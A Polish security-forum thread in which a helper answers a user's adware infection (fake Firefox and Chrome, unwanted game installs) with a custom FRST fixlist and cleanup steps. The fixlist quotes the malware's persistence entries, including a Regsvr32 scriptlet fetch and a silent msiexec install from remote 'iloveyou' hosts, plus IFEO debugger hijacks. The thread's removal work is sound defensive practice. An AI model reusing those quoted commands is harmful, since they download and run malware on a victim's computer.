Skocz do zawartości

Wirus podmieniający przeglądarki, instalujący BigFarm, BigBang


Rekomendowane odpowiedzi

Dzień dobry,

 

nie mogę poradzić sobie ze zlokalizowaniem i usunięciem wirusa, który instaluje na moim komputerze pliki Big Farm i Big Bang Empire, przeglądarkę Chrome (nie korzystam z niej na co dzień) oraz powoduje, że w Firefox pojawia się mnóstwo reklam/okienek. W momencie, w którym wirus instaluje pliki, system Windows bardzo zwalnia, wiesza się, wyłącza się przeglądarka i antywirus AVG (nie można go w tym czasie ponownie uruchomić). Dodam, że żaden z tych plików oczywiście nie pokazuje się w "programy" Windows, można usunąć jedynie ikonę, a ręczna próba usunięcia Firefox/Chrome skończyła się fiaskiem, ponieważ system odmawia dostępu...

 

Próbowałem przez ostatnie 3 tygodnie codziennie czyścić komputer antywirusem i AdwCleanerem, odinstalować Firefox, ale bezskutecznie.

 

Wymagane logi wrzucam w załącznikach.

 

Proszę o pomoc.

Addition.txt

FRST.txt

GMER.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

System jest zainfekowany przez adware. Widoczne są dwie fałszywki Mozilli FireFox oraz Google Chrome (= choć nie ma oryginalnej wersji). Nie będę się rozpisywać, bo codziennie widzę tu to samo. 

 

Portale z oprogramowaniem / Instalatory - na co uważać 

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\ChromeHTML: -> 
Task: {0C1573E6-EB72-4A0D-B905-E6C7F9C00BF2} - System32\Tasks\{D3350727-1A18-45FF-9650-FE53F21D8DB2} => pcalua.exe -a C:\Users\MAGDA\AppData\Local\Temp\{18E20274-F8B2-4061-934E-E94E4F113858}\InstallFlashPlayer.exe -d C:\Users\MAGDA\AppData\Local\Temp\ICD1.tmp -c -iv 6 
Task: {E1EE3ED7-C883-4490-878D-07DB4A475E93} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== scrobj.dll
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
RemoveDirectory: C:\Program Files (x86)\Bangtony
RemoveDirectory: C:\Users\MAGDA\AppData\Local\Bangtony
RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Bangtony
FirewallRules: [{E980C772-4A40-40FF-8818-542C65790C55}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe
FirewallRules: [{27FC16EC-FFB1-4520-9657-903708EE55B9}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikHelper.exe
FirewallRules: [{F76C0C47-6098-4C47-BFF2-D79F08D068BE}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe
FirewallRules: [{F5CB7DEC-6781-44FD-867F-C35B93477FAC}] => (Allow) C:\Program Files (x86)\Mail.Ru\Sputnik\SputnikFlashPlayer.exe
FirewallRules: [{D5CF5E93-C38C-43BA-AAED-B6B1F3D663F0}] => (Allow) C:\Program Files (x86)\Bangtony\Application\chrome.exe
FirewallRules: [{17AA0B84-A7C8-4140-B2BF-336ADA96EDEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{77E9E3FC-75B2-4FF6-A776-0532C8B8AC4F}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\MAGDA\AppData\Local\Firefox
RemoveDirectory: C:\Users\MAGDA\AppData\Roaming\Firefox
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-266744301-1538140241-1666147108-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YFjk8RkIcFjE8MdF4RUNSRjI1FUNLFdE3MUFcFdYdRF== /q
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
GroupPolicy\User: Ograniczenia 
GroupPolicyUsers\S-1-5-21-266744301-1538140241-1666147108-1003\User: Ograniczenia 
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> {E88E0043-C9D4-4e33-8555-FEE4F5B63060} URL = hxxp://go.mail.ru/search?q={searchTerms}&utf8in=1&fr=ietb
BHO-x32: Brak nazwy -> {8984B388-A5BB-4DF7-B274-77B879E179DB} -> Brak pliku
BHO-x32: Brak nazwy -> {b18906df-1dfa-4d50-8a1f-7d076a8c87b7} -> Brak pliku
Toolbar: HKU\S-1-5-21-266744301-1538140241-1666147108-1000 -> Brak nazwy - {09900DE8-1DCA-443F-9243-26FF581438AF} - Brak pliku
R2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp [210946 ] () [brak podpisu cyfrowego] 
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [93696 2017-05-26] () [brak podpisu cyfrowego] 
S1 MpKsl609328ae; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{15547DD3-66D3-4FC6-A0C8-D0267EAC43CD}\MpKsl609328ae.sys [X]
R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] 
C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp:dp
C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp
2017-05-29 07:14 - 2017-05-29 07:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Witryna Sage.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia Handel - Stacja robocza.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Aktywacja.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Elektroniczne zgłoszenie problemu.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Symfonia Handel - Stacja robocza.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sage\Symfonia - Dokumentacja\Umowa licencyjna.lnk
C:\Users\Gość\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk
C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Gość\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Word\aneks_pol%20levant305943631758176149\aneks_pol%20levant.doc.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Excel\03%20kwiecień%202017305869361454104687\03%20kwiecień%202017.xls.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\MAGDA\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Program Files (x86)\Google
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
C:\Users\MAGDA\AppData\Local\Google
DeleteKey: HKCU\Software\Google
DeleteKey: HKLM\SOFTWARE\Google
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarkę Mozilla FireFox.

  • Odłącz synchronizację (o ile włączona): KLIK.
  • Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
  • Menu Historia > Wyczyść historię przeglądania.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
  • Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Mozilla FireFox. To wymagany krok to kasacji modyfikacji infekcji.
3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

bangtony;firefox;biaoJi

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

4. Sprawdź czy AdwCleaner coś wykrywa. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport znajdujący się w C:\AdwCleaner.

 

5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...